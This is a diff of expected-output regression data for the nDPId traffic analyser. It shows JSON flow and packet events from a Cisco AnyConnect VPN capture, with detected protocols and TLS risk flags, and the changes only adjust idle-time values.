+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241064,"flow_last_seen":1569687241064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687241064,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"} 00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569687241452,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":56,"pkt_l4_len":8,"thread_ts_msec":1569687241452,"pkt":"AQBeAAABLH6BsEqhCABGwAAgGHkAAAECIZ0KAAAB4AAAAZQEAAARCu71AAAAAGluZyBzeXNjZmc="} 00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} @@ -20,14 +20,14 @@ 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569687241657,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687241657,"pkt":"AQBeAAD7pHczjPFACABGwAAgAABAAAEC+IcKAACV4AAA+5QEAAAWAAkE4AAA+w=="} 00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569687242271,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242271,"pkt":"AQBefwMWpHczjPFACABGwAAgAABAAAEC5m0KAACV7\/8DFpQEAAAWAPbp7\/8DFg=="} 00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569687242476,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242476,"pkt":"AQBef\/\/6pHczjPFACABGwAAgAABAAAEC6YgKAACV7\/\/\/+pQEAAAWAPoE7\/\/\/+g=="} 00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569687244524,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687244524,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569687245251,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245251,"pkt":"LH6BsEqhNDY7z3UoCABFAABE1h4AAP8RQxAKAADjS0tMTM6PADUAMDW7jEkBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAQ=="} @@ -44,26 +44,26 @@ 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569687245366,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245366,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADYRod5LS0xMCgAA4wA183IAgYoMLLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"} 